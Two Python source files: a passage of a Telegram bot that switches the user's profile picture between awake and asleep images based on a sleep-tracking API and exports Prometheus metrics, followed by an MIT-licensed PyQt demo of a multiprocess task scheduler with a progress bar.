startup_time = Gauge("sleeppic_start_unixtime", "Unix timestamp of the last startup time")
latest_switch_time = Gauge("sleeppic_latest_switch_unixtime", "Unix timestamp of the last pfp switch time")
daily_checks = Counter("sleeppic_dailys_check_total", "Total number of times the dailys API has been checked")
count_upload = Counter("sleeppic_upload_total", "Total count of profile pics uploaded", labelnames=["state"])
count_update = Counter("sleeppic_update_total", "Total count of profile pics updated", labelnames=["state"])
state_enum = prometheus_client.Enum(
"sleeppic_current_state",
"Current state of profile picture",
states=[state_val.name.lower() for state_val in PFPState] + ["unknown"]
)
for state_val in PFPState:
count_upload.labels(state=state_val.name.lower())
count_update.labels(state=state_val.name.lower())
class FileData:
def __init__(self, file_id: int, access_hash: int, file_reference: bytes):
self.file_id = file_id
self.access_hash = access_hash
self.file_reference = file_reference
def __eq__(self, other: "FileData") -> bool:
return isinstance(other, FileData) and self.file_id == other.file_id and self.access_hash == other.access_hash
@classmethod
def from_result(cls, result: 'photos.Photo') -> 'FileData':
return FileData.from_photo(result.photo)
@classmethod
def from_photo(cls, photo: 'Photo') -> 'FileData':
return FileData(
photo.id,
photo.access_hash,
photo.file_reference
)
def to_dict(self) -> Dict[str, str]:
return {
"id": self.file_id,
"access_hash": self.access_hash,
"file_reference": base64.b64encode(self.file_reference).decode('ascii')
}
@classmethod
def from_dict(cls, data: Dict) -> 'FileData':
return FileData(
data['id'],
data['access_hash'],
base64.b64decode(data['file_reference'])
)
def to_input_photo(self) -> InputPhoto:
return InputPhoto(
self.file_id,
self.access_hash,
self.file_reference
)
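# Round-trip sketch: FileData.from_dict(fd.to_dict()) == fd holds, since
# __eq__ above compares file_id and access_hash, and the file_reference bytes
# survive the base64 encode/decode pair in to_dict()/from_dict().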
class ProfilePic:
def __init__(self, path: str, file_data: Optional[FileData], state: PFPState):
self.path = path
self.file_data = file_data
self.state = state
def to_dict(self) -> Dict:
result = {
"path": self.path
}
if self.file_data:
result["file"] = self.file_data.to_dict()
return result
@classmethod
def from_dict(cls, data: Dict, state: PFPState) -> 'ProfilePic':
return ProfilePic(
data['path'],
FileData.from_dict(data['file']) if 'file' in data else None,
state
)
# noinspection PyBroadException
class Dailys:
def __init__(self, endpoint_url: str, auth_key: Optional[str] = ""):
self.endpoint_url = endpoint_url
self.auth_key = auth_key or ""
def current_state(self) -> Optional[PFPState]:
try:
logger.debug("Checking dailys")
resp = requests.get(
self.endpoint_url,
headers={
"Authorization": self.auth_key
}
)
daily_checks.inc()
if resp.status_code == 200:
state = PFPState.ASLEEP if resp.json()['is_sleeping'] else PFPState.AWAKE
logger.debug(f"Dailys sleeping state: {state}")
return state
else:
return None
except Exception as e:
logger.warning("Failed to get status from dailys: ", exc_info=e)
return None
class TelegramConfig:
def __init__(self, api_id: int, api_hash: str):
self.api_id = api_id
self.api_hash = api_hash
class DailysConfig:
def __init__(self, endpoint_url: str, auth_key: Optional[str] = None):
self.endpoint_url = endpoint_url
self.auth_key = auth_key or ""
class Config:
def __init__(
self,
telegram_config: TelegramConfig,
dailys_config: DailysConfig,
awake_pic: ProfilePic,
asleep_pic: ProfilePic,
prom_port: int
) -> None:
self.telegram_config = telegram_config
self.dailys_config = dailys_config
self.awake_pic = awake_pic
self.asleep_pic = asleep_pic
self.prom_port = prom_port
@property
def profile_pics(self) -> List[ProfilePic]:
return [self.awake_pic, self.asleep_pic]
def get_pic_with_state(self, state: PFPState) -> Optional[ProfilePic]:
return next(filter(lambda pfp: pfp.state == state, self.profile_pics), None)
@classmethod
def load_from_file(cls) -> "Config":
with open("config.json", "r") as f:
return cls.from_dict(json.load(f))
@classmethod
def from_dict(cls, data: Dict) -> "Config":
return Config(
TelegramConfig(
data["api_id"],
data["api_hash"]
),
DailysConfig(
data["dailys_url"],
data.get("dailys_auth_key")
),
ProfilePic.from_dict(data["awake_pic"], PFPState.AWAKE),
ProfilePic.from_dict(data["asleep_pic"], PFPState.ASLEEP),
data.get("prometheus_port", 8380)
)
def save_to_file(self) -> None:
config = {
"api_id": self.telegram_config.api_id,
"api_hash": self.telegram_config.api_hash,
"dailys_url": self.dailys_config.endpoint_url,
"dailys_auth_key": self.dailys_config.auth_key,
"awake_pic": self.awake_pic.to_dict(),
"asleep_pic": self.asleep_pic.to_dict()
}
with open("config.json", "w") as f:
logger.debug("Saving config to file")
json.dump(config, f, indent=2)
# noinspection PyBroadException
class TelegramWrapper:
def __init__(self, client: TelegramClient):
self.client = client
self.me = None
async def initialise(self) -> None:
self.me = await self.client.get_me()
self.print_me()
def print_me(self) -> None:
logger.debug(self.me.stringify())
logger.debug(self.me.username)
async def update_profile_photo(self, pfp: ProfilePic) -> Optional[FileData]:
logger.info("Updating profile photo")
count_update.labels(state=pfp.state.name.lower()).inc()
pfp_file = await self.get_pfp_with_photo_id(pfp.file_data.file_id)
pfp_input = pfp.file_data.to_input_photo()
if pfp_file is not None:
pfp_input = pfp_file.to_input_photo()
resp = await self.client(UpdateProfilePhotoRequest(id=pfp_input))
if isinstance(resp.photo, UserProfilePhoto):
new_pfp_id = resp.photo.photo_id
elif isinstance(resp.photo, Photo):
new_pfp_id = resp.photo.id
else:
logger.error(f"UpdateProfilePhotoRequest returned unrecognised type: {resp.photo}")
return None
return await self.get_pfp_with_photo_id(new_pfp_id)
async def get_pfp_with_photo_id(self, photo_id: int) -> Optional[FileData]:
all_photos = await self.client(GetUserPhotosRequest(self.me, 0, 0, 0))
matching_photo = next(filter(lambda p: p.id == photo_id, all_photos.photos), None)
if matching_photo is None:
logger.warning(f"Could not find profile photo with ID: {photo_id}")
return None
return FileData.from_photo(matching_photo)
async def current_pic(self) -> Optional[FileData]:
current_photo_id = self.me.photo.photo_id
return await self.get_pfp_with_photo_id(current_photo_id)
async def upload_profile_photo(self, pfp: ProfilePic) -> FileData:
logger.info("Uploading profile photo")
count_upload.labels(state=pfp.state.name.lower()).inc()
input_file = await self.client.upload_file(pfp.path)
result = await self.client(UploadProfilePhotoRequest(file=input_file))
pfp.file_data = FileData.from_result(result)
return FileData.from_result(result)
async def set_pfp(self, pfp: ProfilePic) -> FileData:
if pfp.file_data is None:
return await self.upload_profile_photo(pfp)
try:
file_data = await self.update_profile_photo(pfp)
if file_data:
return file_data
logger.warning("Could not find file data for newly updated profile picture.")
except Exception as e:
logger.warning("Failed to update profile picture: ", exc_info=e)
pass
return await self.upload_profile_photo(pfp)
class PFPManager:
def __init__(self, config: Config, client: TelegramClient) -> None:
self.config = config
self.client = client
self.dailys = Dailys(self.config.dailys_config.endpoint_url, self.config.dailys_config.auth_key)
self.wrapper = None
self.current_state = None
state_enum.state("unknown")
async def initialise(self) -> None:
self.wrapper = TelegramWrapper(self.client)
await self.wrapper.initialise()
self.current_state = await self.profile_pic_state()
if self.current_state:
state_enum.state(self.current_state.name.lower())
startup_time.set_to_current_time()
async def check_and_update(self) -> None:
new_state = self.dailys.current_state()
if new_state is None:
return
if self.current_state is None or self.current_state != new_state:
logger.info(f"State has changed from {self.current_state} to {new_state}")
self.current_state = new_state
state_enum.state(new_state.name.lower())
await self.update_pic_to_state(new_state)
latest_switch_time.set_to_current_time()
async def update_pic_to_state(self, state: PFPState) -> None:
pfp = self.config.get_pic_with_state(state)
if pfp is None:
logger.error(f"No profile pic configured for state: {state}")
return
# Upload pic for current state
file_data = await self.wrapper.set_pfp(pfp)
pfp.file_data = file_data
# Save current state
self.config.save_to_file()
logger.info(f"Updated photo to: {pfp.path}")
async def profile_pic_state(self) -> Optional[PFPState]:
logger.info("Checking current profile picture state")
current_file = await self.wrapper.current_pic()
if current_file is None:
logger.warning("No profile picture is currently set")
return None
current_id = current_file.file_id
matching_pfps = [
pfp
for pfp in self.config.profile_pics
if pfp.file_data and pfp.file_data.file_id == current_id
]
if not matching_pfps:
logger.warning("Current profile picture did not seem to match any known state")
return None
current_state = matching_pfps[0].state
logger.info(f"Current profile picture is {current_state}")
return current_state
def setup_logging() -> None:
formatter = logging.Formatter("{asctime}:{levelname}:{name}:{message}", style="{")
base_logger = logging.getLogger()
base_logger.setLevel(logging.INFO)
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(formatter)
base_logger.addHandler(console_handler)
async def run() -> None:
conf = Config.load_from_file()
async with TelegramClient('anon', conf.telegram_config.api_id, conf.telegram_config.api_hash) as c:
manager = PFPManager(conf, c)
await manager.initialise()
start_http_server(conf.prom_port)
while True:
try:
logger.info("Checking..")
await manager.check_and_update()
await asyncio.sleep(60)
except KeyboardInterrupt:
break
if __name__ == "__main__":
setup_logging()
event_loop = asyncio.get_event_loop()
event_loop.run_until_complete(run())
logger.info("Shutting down")
|
# MIT License
#
# Copyright (c) 2019 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Demonstrates the usage of Scheduler in a simple PyQt program which shows progress and output.
Dependencies are in `requirements.txt`. To install them, run `pip install -r requirements.txt --user`
in this directory.
"""
import asyncio
import random
import sys
import time
from typing import List, Tuple
import qasync
from PyQt5 import QtGui
from PyQt5.QtWidgets import (
QApplication,
QLabel,
QProgressBar,
QVBoxLayout,
QWidget,
QPushButton,
)
from scheduler.Scheduler import Scheduler
def long_calculation(sleep_time: int) -> int:
"""
Will be executed in another process. Simulates a long calculation, and returns the 'result'.
"""
time.sleep(sleep_time)
return sleep_time
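# Usage sketch (values are illustrative): Scheduler.map in do_calculations
# below fans long_calculation out across worker processes, so args of
# [(3,), (1,)] would come back as the ordered list [3, 1].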
class Window(QWidget):
"""Basic window class."""
def __init__(self):
super().__init__()
layout = QVBoxLayout()
self.setLayout(layout)
self.label = QLabel("Output from processes will be shown here", self)
layout.addWidget(self.label)
self.progress = QProgressBar(self)
layout.addWidget(self.progress)
self.button = QPushButton("Start", self)
self.button.clicked.connect(self.on_click)
layout.addWidget(self.button)
self.scheduler: Scheduler = None
def on_click(self):
"""
Called when the button is clicked.
"""
if self.scheduler is None or not self.scheduler.is_running():
# "Start" was clicked. Start the coroutine which runs the scheduler.
asyncio.ensure_future(self.do_calculations())
self.button.setText("Cancel")
else:
# "Cancel" was clicked. Terminate the scheduler.
self.scheduler.terminate()
self.button.setText("Start")
self.progress.setValue(0)
async def do_calculations(self):
"""
Does the calculations using a scheduler, and shows the output in the label.
"""
self.scheduler = Scheduler(progress_callback=self.on_progress)
num_processes = 16
args = []
for _ in range(num_processes):
sleep_time = random.randint(1, 8)
# Add to list of arguments. Must be tuple.
args.append((sleep_time,))
# Run all processes and `await` the results: an ordered list containing one int from each process.
output: List[int] = await self.scheduler.map(
target=long_calculation, args=args,
)
# (If the scheduler was terminated before completion, we don't want the results).
if not self.scheduler.terminated:
text = ", ".join([str(i) for i in output])
self.label.setText(f"Output: {text}")
self.button.setText("Start")
def on_progress(self, done: int, total: int) -> None:
"""
Updates the progress bar when scheduler finishes a task.
"""
if done == 0:
self.progress.setMaximum(total)
self.progress.setValue(done)
def closeEvent(self, event: QtGui.QCloseEvent) -> None:
"""
Terminates the scheduler when the window exits.
"""
if self.scheduler:
self.scheduler.terminate()
if __name__ == "__main__":
app = QApplication(sys.argv)
# Important: set the event loop using `qasync`.
loop = qasync.QEventLoop(app)
asyncio.set_event_loop(loop)
window = Window()
window.show()
with loop:
sys.exit(loop.run_forever())
|